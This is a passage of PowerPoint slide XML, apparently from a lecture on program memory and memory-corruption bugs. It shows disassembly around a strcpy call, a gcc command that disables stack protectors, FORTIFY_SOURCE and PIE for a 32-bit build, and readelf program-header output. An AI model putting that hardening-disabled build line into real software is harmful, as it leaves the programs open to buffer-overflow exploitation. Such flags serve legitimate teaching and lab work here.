                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80482d0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$0xa,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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leave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="322202" y="5326464"/>
            <a:ext cx="7662440" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -Wall -Wall -O0 -g -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-omit-frame-pointer -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Wno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-deprecated-declarations -D_FORTIFY_SOURCE=0 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-pie -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Wno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-format -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Wno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-format-security -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-stack-protector -m32 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mpreferred</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-stack-boundary=2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>test.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="140553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47500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>readelf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>lW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas"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a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Elf </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> EXEC (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Executable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Entry </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>point</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 0x8048320</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>There</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>are</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 9 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>program</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>starting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>offset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 52</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Program</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> Headers:  Type           Offset   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>VirtAddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>PhysAddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>FileSiz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>MemSiz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Flg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Align</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>PHDR           0x000034 0x08048034 0x08048034 0x00120 0x00120 R E 0x4  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>INTERP         0x000154 0x08048154 0x08048154 0x00013 0x00013 R   0x1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>      [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Requesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>program</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>interpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>: /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>lib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/ld-linux.so.2]  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>LOAD           0x000000 0x08048000 0x08048000 0x005bc 0x005bc R E 0x1000  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>LOAD           0x000f08 0x08049f08 0x08049f08 0x00118 0x0011c RW  0x1000  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>DYNAMIC        0x000f14 0x08049f14 0x08049f14 0x000e8 0x000e8 RW  0x4  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>NOTE           0x000168 0x08048168 0x08048168 0x00044 0x00044 R   0x4  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>GNU_EH_FRAME   0x0004e0 0x080484e0 0x080484e0 0x0002c 0x0002c R   0x4  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RW  0x10  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>GNU_RELRO      0x000f08 0x08049f08 0x08049f08 0x000f8 0x000f8 R   0x1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
